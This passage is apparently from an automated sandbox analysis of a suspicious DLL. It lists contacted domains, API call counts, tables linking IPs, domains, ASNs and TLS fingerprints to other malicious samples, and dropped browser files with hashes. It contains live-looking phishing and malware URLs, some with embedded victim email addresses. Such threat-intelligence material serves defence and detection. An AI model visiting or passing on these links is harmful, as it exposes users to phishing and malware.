neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, au.download.windowsupdate.com.edgesuite.net, a-0003.fbs2-a-msedge.net, store-images.s-microsoft.com-c.edgekey.net, a-0003.dc-msedge.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, e5416.g.akamaiedge.net, www.googletagmanager.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ie9comview.vo.msecnd.net, www-googletagmanager.l.google.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, img.ui-portal.de.edgekey.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, cdp.geotrust.com, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, dl.mail.com.edgekey.net, static-global-s-msn-com.akamaized.net, crl3.digicert.com, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:29:43	API Interceptor	1x Sleep call for process: loaddll32.exe modified
14:29:57	API Interceptor	1x Sleep call for process: rundll32.exe modified
14:30:03	API Interceptor	1x Sleep call for process: regsvr32.exe modified
14:31:08	API Interceptor	107x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
195.20.250.115	2770174.dll	Get hash	malicious	Browse
45.90.58.179	2770174.dll	Get hash	malicious	Browse	taybhctdyehfhgthp2.xyz/favicon.ico
52.97.144.178	February Payroll.xls.htm	Get hash	malicious	Browse
	PURCHASE ORDER#34556558.exe	Get hash	malicious	Browse
	E-DEKONT.exe	Get hash	malicious	Browse
	https://special-mammoth.10web.me/	Get hash	malicious	Browse
	https://u16721394.ct.sendgrid.net/ls/click?upn=ZE2iHXIh63RVkll1-2BQgqEmlYFMWH-2FfHrxLYn3o43CjsIVeCDHGU5Sahr6imAfCa-2Bh741wm5n0X62mYkeVQ8ofQOi4CQg1aq-2Fby87pCo1BEU-3DVM3e_zl7Xcn9e9VctHOHawJAVbRvWqpv4ongAqw1x7Ku9gVu2XhK859fpxoQ9j9IXdqwf-2FqF15vaUeAfnbtae5frJhK3-2BGMlMsQC2P8vjWGxa4Hs-2B4KAXNiCi1x1HPRTTX5GLvslXgcrvWBYH0KLd6DAdmTE1dNMbt1Kmoqqezb9Y7OBlPr-2Bzbg0Weu5e3ZwTWQG-2Bo-2Bi-2FYxdr51GHj6ZQmJ9h5LBx6qIX4PJRM4BBZzqZHeI-3D	Get hash	malicious	Browse
	https://20200923075023-dot-s2pe7ed9y.rj.r.appspot.com/office/index.php#leca@lecagraphics.com	Get hash	malicious	Browse
	http://outlook.com/owa/airmasteraustralia.onmicrosoft.com	Get hash	malicious	Browse
	https://micauth3dghmocgam3l-secondary.z9.web.core.windows.net/?=en-us&username=rick.huey@cci.com	Get hash	malicious	Browse
	5HSBC_Payment_Advise,pdf.exe	Get hash	malicious	Browse
	XUNgjfaf6u.exe	Get hash	malicious	Browse
82.165.229.87	2770174.dll	Get hash	malicious	Browse
82.165.229.87	2ff0174.dll	Get hash	malicious	Browse
40.101.81.146	RECEIPT.exe	Get hash	malicious	Browse
	https://storage.googleapis.com/ahulloa-511072598/index.html	Get hash	malicious	Browse
	https://ytryrya-71.tk/index.html#test@gmail.com	Get hash	malicious	Browse
	https://firebasestorage.googleapis.com/v0/b/dddddddd-d7e09.appspot.com/o/index.html?alt=media&token=8d31ceb9-48dc-427d-9522-19dd14f49d8e#FinanceTeam@davis.co.nz	Get hash	malicious	Browse
	https://firebasestorage.googleapis.com/v0/b/dddddddd-d7e09.appspot.com/o/index.html?alt=media&token=8d31ceb9-48dc-427d-9522-19dd14f49d8e#FinanceTeam@davis.co.nz	Get hash	malicious	Browse
	https://brp-mkt-prod1-t.adobe-campaign.com/r/?id=h27a89d6,190dc93,190dc9a&p1=56tyghjnmws.blob.core.windows.net%2Fhjm%2FAbV.html%23cmVuYXRhLnR1bWVsQGJyZXdpbi5jby51aw==	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wa.ui-portal.de	2770174.dll	Get hash	malicious	Browse	82.165.229.54
	2ff0174.dll	Get hash	malicious	Browse	82.165.229.54
	https://deref-mail.com/mail/client/QUue7ijDGeE/dereferrer/?redirectUrl=https%3A%2F%2Fadmin.microsoft.com%2Fadminportal%2Fhome%3Fref%3DMessageCenter%3FshowPref%3D1	Get hash	malicious	Browse	82.165.229.54
www.mail.com	2770174.dll	Get hash	malicious	Browse	82.165.229.59
	2ff0174.dll	Get hash	malicious	Browse	82.165.229.59
	https://deref-mail.com/mail/client/QUue7ijDGeE/dereferrer/?redirectUrl=https%3A%2F%2Fadmin.microsoft.com%2Fadminportal%2Fhome%3Fref%3DMessageCenter%3FshowPref%3D1	Get hash	malicious	Browse	82.165.229.59
tls13.taboola.map.fastly.net	2770174.dll	Get hash	malicious	Browse	151.101.1.44
	q7p7x4f4gX.dll	Get hash	malicious	Browse	151.101.1.44
	q7p7x4f4gX.dll	Get hash	malicious	Browse	151.101.1.44
	3rc4z6ltNu.dll	Get hash	malicious	Browse	151.101.1.44
	f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dll	Get hash	malicious	Browse	151.101.1.44
	6us663UjcE.dll	Get hash	malicious	Browse	151.101.1.44
	6us663UjcE.dll	Get hash	malicious	Browse	151.101.1.44
	xbK9XyU4LW.dll	Get hash	malicious	Browse	151.101.1.44
	xbK9XyU4LW.dll	Get hash	malicious	Browse	151.101.1.44
	juON02msHS.dll	Get hash	malicious	Browse	151.101.1.44
	juON02msHS.dll	Get hash	malicious	Browse	151.101.1.44
	r5wdbvxLE4.dll	Get hash	malicious	Browse	151.101.1.44
	pvvCaP2Nma.dll	Get hash	malicious	Browse	151.101.1.44
	IsNv5L683X.dll	Get hash	malicious	Browse	151.101.1.44
	r5wdbvxLE4.dll	Get hash	malicious	Browse	151.101.1.44
	IsNv5L683X.dll	Get hash	malicious	Browse	151.101.1.44
	pvvCaP2Nma.dll	Get hash	malicious	Browse	151.101.1.44
	SoMuAF6xvf.dll	Get hash	malicious	Browse	151.101.1.44
	SoMuAF6xvf.dll	Get hash	malicious	Browse	151.101.1.44
	52470XObuZ.dll	Get hash	malicious	Browse	151.101.1.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GREENFLOID-ASUA	2770174.dll	Get hash	malicious	Browse	45.90.58.179
	o7w2HSi17V.exe	Get hash	malicious	Browse	195.123.239.194
	SecuriteInfo.com.BackDoor.Rat.281.18292.exe	Get hash	malicious	Browse	195.123.237.148
	cancel_sub_VCP1234567890123.xlsb	Get hash	malicious	Browse	195.123.235.51
	cancel_sub_VCP1234567890123.xlsb	Get hash	malicious	Browse	195.123.235.51
	cancel_sub_VCP1234567890123.xlsb	Get hash	malicious	Browse	195.123.235.51
	gFXQS9OTMt.exe	Get hash	malicious	Browse	195.123.233.175
	2ff0174.dll	Get hash	malicious	Browse	82.118.22.204
	B21B.ps1	Get hash	malicious	Browse	195.123.243.169
	XPj18TpTO3.exe	Get hash	malicious	Browse	195.123.235.25
	41065596157-04232021.xlsm	Get hash	malicious	Browse	195.123.247.118
	41065596157-04232021.xlsm	Get hash	malicious	Browse	195.123.247.118
	41065596157-04232021.xlsm	Get hash	malicious	Browse	195.123.247.118
	Funds_Withdrawal_1076573799_05252021.xlsm	Get hash	malicious	Browse	45.90.58.90
	Funds_Withdrawal_1076573799_05252021.xlsm	Get hash	malicious	Browse	45.90.58.90
	SKMBT41085NC9.exe	Get hash	malicious	Browse	91.90.195.19
	4e94899b_by_Libranalysis.xlsx	Get hash	malicious	Browse	45.90.58.90
	cc859408_by_Libranalysis.xlsx	Get hash	malicious	Browse	45.90.57.62
	4e94899b_by_Libranalysis.xlsx	Get hash	malicious	Browse	45.90.58.90
	cc859408_by_Libranalysis.xlsx	Get hash	malicious	Browse	45.90.57.62
ONEANDONE-ASBrauerstrasse48DE	2770174.dll	Get hash	malicious	Browse	82.165.229.54
	PO_0187.eml.exe	Get hash	malicious	Browse	217.160.0.47
	Rq0Y7HegCd.exe	Get hash	malicious	Browse	217.160.0.254
	PO_0187.exe	Get hash	malicious	Browse	217.160.0.101
	i	Get hash	malicious	Browse	87.106.201.67
	Ordine 6809 020621.exe	Get hash	malicious	Browse	74.208.236.193
	Payment_Breakdown_pdf.exe	Get hash	malicious	Browse	217.160.0.245
	itachi Terminal Solutions Korea #Ubc1c#Uc8fc#Uc11c nf 21-0649 (#Ud68c#Uc2e0#Uc694#Ub9dd).exe	Get hash	malicious	Browse	217.160.233.139
	WO 2308349.xlsb	Get hash	malicious	Browse	74.208.236.234
	WO 2308349.xlsb	Get hash	malicious	Browse	74.208.236.234
	4dvYb6Nq3y.exe	Get hash	malicious	Browse	217.160.0.194
	puuXkjM8wR.exe	Get hash	malicious	Browse	82.165.229.54
	Invoice confirmation & NEW PO for 2 sets of items.exe	Get hash	malicious	Browse	217.160.0.136
	payment_copy.exe	Get hash	malicious	Browse	217.160.0.252
	ACSjyx6D3s.msi	Get hash	malicious	Browse	217.160.0.100
	W5kmdhQmSZ.exe	Get hash	malicious	Browse	217.160.0.62
	PO NEW ORDER 002001123.exe	Get hash	malicious	Browse	217.160.0.190
	N0vpYgIYpv.exe	Get hash	malicious	Browse	217.160.0.236
	droxoUY6SU.exe	Get hash	malicious	Browse	217.160.0.200
	Order.exe	Get hash	malicious	Browse	74.208.236.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	2770174.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	q7p7x4f4gX.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	q7p7x4f4gX.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	PO # 2367.html	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	( 1 ) Voice note-Dassault-aviation.htm	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	mJSDCeNxFi.exe	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	3rc4z6ltNu.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	3rc4z6ltNu.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	iew852qEQI.exe	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	6us663UjcE.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	6us663UjcE.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	xbK9XyU4LW.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	xbK9XyU4LW.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	juON02msHS.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	juON02msHS.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	HCqVspxrwz.exe	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	r5wdbvxLE4.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	pvvCaP2Nma.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	IsNv5L683X.dll	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44
	XecEMJQdUx.exe	Get hash	malicious	Browse	82.165.229.16 195.20.250.115 104.20.185.68 82.165.229.59 142.250.180.206 87.248.118.22 82.165.229.87 82.165.229.54 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\BACZYXTY\dl.mail[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	264
Entropy (8bit):	4.426310079989622
Encrypted:	false
SSDEEP:	6:JFK1rFK1rUFCYJqqwDYTR3y2LHeTZ1rFK1rUFCYJqqwDYTR3y2LHeTZ1rFKb:JsrsrU0s7u23yqHIrsrU0s7u23yqHIrS
MD5:	30A661AAC645B1D21DEE7C288FAE18C6
SHA1:	984B597329CA1F9F8D12ED88A95800E38D4AEC45
SHA-256:	F427DBA907CBC5AD4AA99FA2E02A5B96E752E876AD1DD5522C11AE455E0679FD
SHA-512:	BBD8E09700CFA0CDBDEB42133FF35208E626E601FF0AB2F4D2608350FA8B8B7D010B19E5180F3220261687CFF3373332BBA57D4AF037D3632CF334B100BB7F44
Malicious:	false
Preview:	<root></root><root></root><root><item name="__storage_test__" value="__storage_test__" ltime="3009959552" htime="30896738" /></root><root></root><root><item name="__storage_test__" value="__storage_test__" ltime="3009959552" htime="30896738" /></root><root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2995
Entropy (8bit):	4.890884861513073
Encrypted:	false
SSDEEP:	48:LBZBZBpZBZBPZBZ3Z3PZ3Z3AlZ3ZYZYQZYZYZZhZhZhZZhZhZhuZhZhPXQwZhPXS:dbbpbbPbZZPZZAlZWWQWWZzzzZzzzuzS
MD5:	6392171CFB71DE9AFF109F3691AFBE31
SHA1:	8EF58517F29DBDC7346B6C3C7A26727C9B8021D2
SHA-256:	897412D6DCD6A7C18D8470E948626F38583D5B6BF3A8FEAF578BAA2E4B3E3CB0
SHA-512:	5772AA7DC42C44128CBE2A21FC7F2482A265B3E2927AD2C05A0FA777DCBB88040CADDC75713350AA9EE174D102070E527D3E48CA394C773E214E8C58F09E4115
Malicious:	false
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="2552989552" htime="30896738" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2552989552" htime="30896738" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2552989552" htime="30896738" /><item name="mntest" value="mntest" ltime="2552989552" htime="30896738" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2552989552" htime="30896738" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2552989552" htime="30896738" /><item name="mntest" value="mntest" ltime="2553489552" htime="30896738" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2552989552" htime="30896738" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2553489552" htime="30896738" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2553489552" htime="30896738" /><item name="mntest" value="mntest" ltime="2553489552" htime="30896738" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2553489552" htime="30896738" /></root><ro

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\www.mail[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aK1r0aKb:JFK1rFKb
MD5:	132294CA22370B52822C17DCB5BE3AF6
SHA1:	DD26B82638AD38AD471F7621A9EB79FED448A71C
SHA-256:	451ABBE0AEFC000F49967DABF8D42344D146429F03C8C8D4AE5E33FF9963CF77
SHA-512:	6D5808CAD199A785C82763C68F0AE1F4938C304B46B70529EA26B3D300EF9430AD496C688D95D01588576B3A577001D62245D98137FD5CD825AD62E17D36F15C
Malicious:	false
Preview:	<root></root><root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D216EB03-DE55-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	562616
Entropy (8bit):	2.6546929107133335
Encrypted:	false
SSDEEP:	384:rW3Xns8zG4RwZ0XR+0nGaXHwNsf3ba2Ygyfr2jf2WGnQ5LwFAifiDWRdAH18gT8B:c8QQifWjkcGwp5wBXE
MD5:	51EF7A4A7614B63188F4DEAA08010CB8
SHA1:	CF8DC2A6374E92E9BDF74821E56CBD2D460863BE
SHA-256:	029C740AE2A5C1C8611C6CCF9EB9590A93964A2C7AE82F502F0B28223F18CC52
SHA-512:	F9621F2A9A47D9D434DC134F073D7A7C4F08CA4540DBE0C5EBEBD1E5B13DC4219A9A67EAC397F75CB3E5D53DC5F09ADD2272FD2642E2053B7FC731A47358B408
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{042C35A1-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27392
Entropy (8bit):	1.8500065696755474
Encrypted:	false
SSDEEP:	192:rrZIQ96zk6jx2FWUMkKcmy8dmRcmy8dTyVA:r9xo40gcBDcF
MD5:	763AB1AFFE57E6AC6FB231FDE3DFA0F7
SHA1:	F3010E2D7F4C5903A5781D24C4B475E15AA957A4
SHA-256:	0E5789427B7A6BAC045DEE11C05F5C159850C9303C104143366D059DAC87D8A3
SHA-512:	B1151A5D676706B8FAF10AED64A08E123D74240C6E88FA80623F2A0994180849848EEFCAE844677614244E61DC83D57A7D66EEAF8994D8B13FBD3D9ADC30A705
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{042C35A3-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27384
Entropy (8bit):	1.8488798485112623
Encrypted:	false
SSDEEP:	192:rtZSQy6ckqjx2UWCM6yui9RTlRui9RTuFA:rD/dBkgDzRD7TLD7Tum
MD5:	E758DDA1F1B51990B4F893E61C9F857D
SHA1:	B1F69F59206A72FE7DF9A232AF7696DF53F693E9
SHA-256:	BCDEA45B7B109FA9DBD6DA065AA15093621ED970D24DD586C99FC9AFBA61FBB5
SHA-512:	D7D4523C1EE7FA9C6133B9426C966CF78C133DDF316D51412F58A4B5CB76BFC3845E0530766C956C48CC499B7AA5C27C9E273B6C90EB2DBD54EBB5CFCD7BEC5D
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{042C35A5-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27368
Entropy (8bit):	1.8396424745946436
Encrypted:	false
SSDEEP:	192:rN7ZH2QI36erkVjB2hWUMcibHZmqGsxbHZmqGoZ7A:rDjxZxwQBTjZycjZyoZ8
MD5:	494495B18A4F7F6F1521FB07EF3C19F6
SHA1:	C42AFDA0DEBCD967D310353CAF48234F5780E705
SHA-256:	2C1B625805A603233F8D4158D5CFCB82DA47C07C32B60823B6E16C8784675F21
SHA-512:	33F4731E9B36F00549AAFE6F86CF04B001F8F8C17464E4C1FB45E60B5B9A67EE2C0627B08064835F1B96844BEFEDB74B712DC3403E9AEAB5579374A63E5E90B9
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{042C35A7-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27404
Entropy (8bit):	1.8536274452201829
Encrypted:	false
SSDEEP:	192:rLZkQp6zkvjF21WbMbehDRUQ9Zt7xhDRUQ9Zt5UQpA:rdtE4r8MISYQTjYQToQS
MD5:	7D53CBE93A0329774AF63340605B1BB5
SHA1:	C2747D11EBD9EA36BA5E3D93419E257E15D4DF1C
SHA-256:	054967454E2DF7CFA4C4F328A3F8FCD25FA9118432FABD8D338B75743882D12A
SHA-512:	6F26B048FD17D6B82EA2960CDD3C3EC2EDE80556B5F855DEFD661539CC62BB6E8C8AD3A2C032D4F2DFD56B8BC44147DDC95013B795747B84C69779ED38B0D056
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{042C35A9-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.8414889997013875
Encrypted:	false
SSDEEP:	96:rKZv9Qx6jBStj52RW6Mi+9cYCQx9cYCFPA:rKZFQx6jktj52RW6Mi+9c0x9cpPA
MD5:	E5129E7DB6070390ADADD86E604C0B1D
SHA1:	9D9BE4CF8F30A20B64B2F475D26DE90024A6BBBC
SHA-256:	0DF5427CCF06157D023715BBDAC0D5D1F62E96E19A2ACC1082DE9F928731F0C8
SHA-512:	7959168D579434A4DE5BB77FECD76A8BC2CD4BA0A774DE12D5CF185A2109BDC0C16CB3E0C15C557F8B19CD2926D8F13C000FFC0660E763EDD4F740FF5AC6C305
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0C1EC9B7-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27372
Entropy (8bit):	1.8426004232484925
Encrypted:	false
SSDEEP:	48:IwgGcpr5jGwpaNG4pQKGrapbS4GQpBuGHHpcjTGUp8pGzYpmB3GopcrNlB7LlqF2:rEZ59Qv68BSAj929WnML+jJlBxjJl2A
MD5:	B91176BC43279EF8C7151F8F4EE31D1C
SHA1:	379DDC7580D03092B61FF8B80A607C416FF204EC
SHA-256:	E4452F3375A695C24984229A0EF63E2C2B9C7DCBFC9EE759550F49FA75840041
SHA-512:	BA354708E0B86D7B8ED3AA365F6E830C5725E083B584AB3D8D83D823466DCD0B256F6E012A206F944882050C4C8A4653FF83C31F81CD33FA4776148B55A1DAF5
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0C1EC9B9-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.842745337832001
Encrypted:	false
SSDEEP:	96:rEZo9QI6+BSsjbas2bYWWbHMbD6BYgVxBYgyA:rEZUQI6+ksjl29WrMX6GgVxGgyA
MD5:	25783C6D83B034FCF1649B643D58C418
SHA1:	DC08C5F751CAB6CD2370830AF9FA297E50C36A7B
SHA-256:	EB4AE3F6DA6AC617E31DE28BD207C0B51A0DA50C096BD90C3B306DB9BE1F6862
SHA-512:	68CCCFAA7113C36D55211E4B73EE9F50C02C8BECF6C631A648255B9CFD7320291A123D75FB92C3BD53E147611F2D03D7EFAB29CCE1759F1BCCA64AD9A87B494D
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1520F844-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27384
Entropy (8bit):	1.8462826975416524
Encrypted:	false
SSDEEP:	96:rjhZ+l9Qid6MBSVjJ25WuM9yScDz0BRScDz04zoA:r1Z+7QW6MkVjJ25WuM9yScEBRScE4zoA
MD5:	ACFA0EA6A4D3575B4AA31BE4273A80AA
SHA1:	AE731950EC6D818166F7DE53A82DD13CD7DFF6B4
SHA-256:	632176809DF89BC0EF877CA1D4B367C10AAB17336118CFBE6F56E34D409D22C9
SHA-512:	51DE8DD34DCF2467D2EEDB49422F4B4C49CDD2F7D0C8685DC5668ED9154D3FD1BEF43CD9B9A2C9B44BF3CA9889C2B41CC0AD3B77C8508EE0E0746699FCBF8F65
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1520F846-DE56-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.84553199170425
Encrypted:	false
SSDEEP:	96:r1ZC9QS6ABSYjB29WkM06pRtOcwCPxpRtOcwCytMA:r1ZOQS6AkYjB29WkM06pRMTQxpRMTZuA
MD5:	CAC0CC48DCA1063269278D6912E67987
SHA1:	777C2637A1290A1D598358BB156C5DBA88538F6A
SHA-256:	F5C2929C42A0466A5D7F9CB1D3B2FCEFA331B48F0C1999882AFF7C4F953BA75E
